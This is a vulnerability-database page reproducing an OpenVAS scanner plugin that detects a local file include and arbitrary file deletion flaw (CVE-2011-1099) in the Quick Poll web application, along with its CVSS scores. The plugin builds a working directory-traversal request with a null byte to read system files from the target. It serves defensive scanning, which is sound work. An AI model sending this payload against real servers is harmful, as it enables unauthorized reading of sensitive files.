Lucene search

K
openvasCopyright (C) 2011 Greenbone AGOPENVAS:1361412562310103110
HistoryMar 08, 2011 - 12:00 a.m.

Quick Poll Local File Include and Arbitrary File Deletion Vulnerabilities

2011-03-0800:00:00
Copyright (C) 2011 Greenbone AG
plugins.openvas.org
10

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:N/A:P

AI Score

6.2

Confidence

Low

EPSS

0.015

Percentile

86.8%

Quick Poll is prone to a local file-include vulnerability and an arbitrary-file-
deletion vulnerability because the application fails to sufficiently sanitize user-supplied input.

# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103110");
  script_version("2023-12-13T05:05:23+0000");
  script_tag(name:"last_modification", value:"2023-12-13 05:05:23 +0000 (Wed, 13 Dec 2023)");
  script_tag(name:"creation_date", value:"2011-03-08 14:02:18 +0100 (Tue, 08 Mar 2011)");
  script_tag(name:"cvss_base", value:"5.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:N/A:P");
  script_cve_id("CVE-2011-1099");
  script_name("Quick Poll Local File Include and Arbitrary File Deletion Vulnerabilities");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/46770");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/516873");
  script_xref(name:"URL", value:"http://www.uncompiled.com/2011/03/quick-polls-local-file-inclusion-deletion-vulnerabilities-cve-2011-1099/");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2011 Greenbone AG");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl", "os_detection.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"solution", value:"Vendor patch is available. Please see the reference for details.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"summary", value:"Quick Poll is prone to a local file-include vulnerability and an arbitrary-file-
  deletion vulnerability because the application fails to sufficiently sanitize user-supplied input.");

  script_tag(name:"impact", value:"An attacker can exploit a local file-include vulnerability to obtain
  potentially sensitive information and execute arbitrary local scripts in the context of the webserver
  process. This may allow the attacker to compromise the application and the computer. Other attacks are
  also possible.

  Attackers can exploit arbitrary-file deletion vulnerability with directory-
  traversal strings ('../') to delete arbitrary files. This may aid in
  launching further attacks.");

  script_tag(name:"affected", value:"Versions prior to Quick Poll 1.0.2 are vulnerable.");

  exit(0);
}

include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("host_details.inc");
include("os_func.inc");

port = http_get_port( default:80 );
if( ! http_can_host_php( port:port ) ) exit( 0 );

files = traversal_files();

foreach dir( make_list_unique( "/quickpoll", http_cgi_dirs( port:port ) ) ) {

  if( dir == "/" ) dir = "";
  buf = http_get_cache(item:dir + "/index.php", port:port);
  if(!buf || buf !~ "^HTTP/1\.[01] 200")
    continue;

  foreach file( keys( files ) ) {

    url = string(dir, "/index.php?fct=preview&p=",crap(data:"../",length:6*9),files[file],"%00");

    if( http_vuln_check( port:port, url:url, pattern:file ) ) {
      report = http_report_vuln_url( port:port, url:url );
      security_message( port:port, data:report );
      exit( 0 );
    }
  }
}

exit( 99 );

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:N/A:P

AI Score

6.2

Confidence

Low

EPSS

0.015

Percentile

86.8%